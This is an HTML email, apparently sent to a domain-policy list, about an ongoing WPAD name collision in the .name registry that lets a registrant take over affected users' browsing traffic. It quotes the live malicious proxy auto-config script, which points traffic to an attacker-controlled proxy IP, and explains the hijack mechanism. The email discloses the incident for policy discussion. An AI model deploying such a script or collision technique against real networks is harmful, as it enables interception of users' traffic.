<html><head><meta http-equiv="Content-Type" content="text/html charset=us-ascii"></head><body style="word-wrap: break-word; -webkit-nbsp-mode: space; -webkit-line-break: after-white-space;" class=""><div class=""><br class=""></div><div class="">Nothing like real life experience to base policy discussions: there is an ongoing name collision incident in a legacy gTLD. </div><div class=""><br class=""></div><div class="">D-Link routers have a default parameter given to local networks the suffix domain.name ; so, names without a full domain name get appended domain.name for its queries. </div><div class=""><br class=""></div><div class="">Microsoft operating systems query for the string "wpad" to determine local proxy servers of an organisation. </div><div class=""><br class=""></div><div class="">.name is a registry where a domain is required to be first.last.name , with two labels. </div><div class=""><br class=""></div><div class="">So... someone registered wpad.domain.name and is now taking over browsing traffic for the affected users, which can be in the order of millions but are least in the thousands. </div><div class=""><br class=""></div><div class="">For live view of the redirection process:</div><div class=""><a href="https://gwhois.org/wpad.domain.name+dns" class="">https://gwhois.org/wpad.domain.name+dns</a></div><div class=""><br class=""></div><div class=""><a href="http://wpad.domain.name/wpad.dat" class="">http://wpad.domain.name/wpad.dat</a> will return the list of proxy servers under attacker control. </div><div class=""><br class=""></div><div class="">(It currently returns this:</div><div class=""><div style="margin: 0px; font-size: 11px; line-height: normal; font-family: Menlo;" class=""><span style="font-variant-ligatures: no-common-ligatures" class="">function FindProxyForURL(url, host) {</span></div><div style="margin: 0px; font-size: 11px; line-height: normal; font-family: Menlo;" class=""><span style="font-variant-ligatures: no-common-ligatures" class=""><span class="Apple-tab-span" style="white-space:pre"> </span>return 'PROXY 185.82.212.95:8080; DIRECT'; </span></div><div style="margin: 0px; font-size: 11px; line-height: normal; font-family: Menlo;" class=""><span style="font-variant-ligatures: no-common-ligatures" class="">}</span></div></div><div class=""><span style="font-variant-ligatures: no-common-ligatures" class="">)</span></div><div class=""><span style="font-variant-ligatures: no-common-ligatures" class=""><br class=""></span></div><div class=""><span style="font-variant-ligatures: no-common-ligatures" class=""><br class=""></span></div><div class="">Policy question for the item "name collisions in legacy gTLDs" is whether contracted parties should be obliged to act in a certain way under similar circumstances. </div><div class=""><br class=""></div><div class=""><br class=""></div><div class="">Rubens</div><div class=""><br class=""></div></body></html>